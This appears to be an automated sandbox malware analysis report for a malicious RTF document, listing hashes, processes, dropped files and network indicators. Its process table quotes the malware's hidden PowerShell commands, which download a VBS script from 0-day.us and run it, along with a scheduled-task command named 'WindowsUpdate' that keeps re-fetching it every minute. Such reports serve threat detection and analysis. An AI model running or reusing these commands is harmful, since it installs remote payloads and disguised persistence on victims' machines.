File name: | 2.doc |
Full analysis: | https://app.any.run/tasks/a1fe0c1d-2c88-481f-82e6-35328ba66b9e |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 14:09:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | F379111ED445ADE7157ADE15976E76B8 |
SHA1: | 8332CAAAD5B4CFB9A3E576AA0D494A40DE24860C |
SHA256: | F7DE2CDBBCDA0F35E2CDFF43DA93301E33F1A655A4EFC9A3B6E560BBA8701340 |
SSDEEP: | 24576:s5Zvp5Zvi5ZvM5Zv05ZvE5Zvl5Zvd5Zvi5ZvE5Zvn:q |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 86 |
---|---|
CharactersWithSpaces: | 392 |
Characters: | 335 |
Words: | 58 |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 2 |
ModifyDate: | 2018:03:12 22:02:00 |
CreateDate: | 2018:03:12 22:02:00 |
LastModifiedBy: | Windows User |
Author: | Windows User |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3504 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
2020 | cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://0-day.us/img/2.vbs','%Public%\\svchost325.vbs');Start-Process '%Public%\\svchost325.vbs' | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
968 | SchTasks /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://0-day.us/img/2.vbs\\\",\\\"$env:public\svchost32.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost32.vbs\\\");" /F | C:\Windows\system32\SchTasks.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3484 | powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://0-day.us/img/2.vbs','C:\Users\Public\\svchost325.vbs');Start-Process 'C:\Users\Public\\svchost325.vbs' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1644 | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(\"http://0-day.us/img/2.vbs\",\"$env:public\svchost32.vbs\");(New-Object -com Shell.Application).ShellExecute(\"$env:public\svchost32.vbs\"); | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE | taskeng.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6695.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3504 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6F01.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MXD2E1NLH1WYF0FNWBNN.temp | — | |
MD5:— | SHA256:— | |||
1644 | Powershell.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\88CNW4S89X82EAB9BBME.temp | — | |
MD5:— | SHA256:— | |||
1644 | Powershell.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A272B20D1454EFE23A324E582F0E701D | SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 | |||
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A272B20D1454EFE23A324E582F0E701D | SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 | |||
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF187589.TMP | binary | |
MD5:A272B20D1454EFE23A324E582F0E701D | SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 | |||
1644 | Powershell.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF189c99.TMP | binary | |
MD5:A272B20D1454EFE23A324E582F0E701D | SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:39FB5468FDA3B01BD0E9143BDDE1AD47 | SHA256:393278A7DB63645C7F839369F8814CEAEDDF2A87EF1F1DF0F612F76CA6BCDF91 | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDE3EE41.emf | emf | |
MD5:6AE8648267F97208E8A7FD6FF41023B4 | SHA256:BE0087ECD00186B38B8DFA380E51AF7568185B3553835C8FD405793AB69657B1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1644 | Powershell.EXE | GET | 302 | 103.224.212.222:80 | http://0-day.us/img/2.vbs | AU | — | — | malicious |
1644 | Powershell.EXE | GET | 403 | 185.53.179.29:80 | http://ww38.0-day.us/img/2.vbs | DE | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1644 | Powershell.EXE | 185.53.179.29:80 | ww38.0-day.us | Team Internet AG | DE | malicious |
3484 | powershell.exe | 103.224.212.222:80 | 0-day.us | Trellian Pty. Limited | AU | malicious |
1644 | Powershell.EXE | 103.224.212.222:80 | 0-day.us | Trellian Pty. Limited | AU | malicious |
Domain | IP | Reputation |
---|---|---|
0-day.us |
| malicious |
ww38.0-day.us |
| malicious |